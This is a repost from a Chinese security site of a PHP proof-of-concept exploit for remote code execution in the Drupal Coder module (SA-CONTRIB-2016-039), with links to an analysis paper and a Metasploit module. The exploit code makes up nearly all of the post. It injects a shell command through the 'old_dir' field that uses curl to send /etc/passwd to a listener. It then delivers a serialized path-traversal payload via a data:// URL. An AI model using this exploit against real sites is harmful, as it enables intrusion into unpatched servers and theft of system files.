Drupal Module Coder < 7.x-1.3 / 7.x-2.6 - Remote Code Execution Exploit (SA-CONTRIB-2016-039)

没穿底裤 2020年1月1日03:49:17评论566 views字数 876阅读2分55秒阅读模式
摘要

具体的分析过程。https://www.exploit-db.com/docs/40244.pdf相关的msf利用代码https://github.com/rapid7/metasploit-framework/pull/7115/files

具体的分析过程。https://www.exploit-db.com/docs/40244.pdf

<?php  # Drupal module Coder Remote Code Execution (SA-CONTRIB-2016-039) # https://www.drupal.org/node/2765575 # by Raz0r (http://raz0r.name) # # E-DB Note: Source ~ https://gist.github.com/Raz0r/7b7501cb53db70e7d60819f8eb9fcef5  $cmd = "curl -XPOST http://localhost:4444 -d @/etc/passwd"; $host = "http://localhost:81/drupal-7.12/";  $a = array(     "upgrades" => array(         "coder_upgrade" => array(             "module" => "color",             "files" => array("color.module")         )     ),     "extensions" => array("module"),     "items" => array (array("old_dir"=>"test; $cmd;", "new_dir"=>"test")),     "paths" => array(         "modules_base" => "../../../",         "files_base" => "../../../../sites/default/files"     ) ); $payload = serialize($a); file_get_contents($host . "/modules/coder/coder_upgrade/scripts/coder_upgrade.run.php?file=data://text/plain;base64," . base64_encode($payload));  ?>

相关的msf利用代码https://github.com/rapid7/metasploit-framework/pull/7115/files
Drupal Module Coder < 7.x-1.3 / 7.x-2.6 - Remote Code Execution Exploit (SA-CONTRIB-2016-039)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
没穿底裤
  • 本文由 发表于 2020年1月1日03:49:17
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Drupal Module Coder < 7.x-1.3 / 7.x-2.6 - Remote Code Execution Exploit (SA-CONTRIB-2016-039)https://cn-sec.com/archives/76863.html

发表评论

匿名网友 填写信息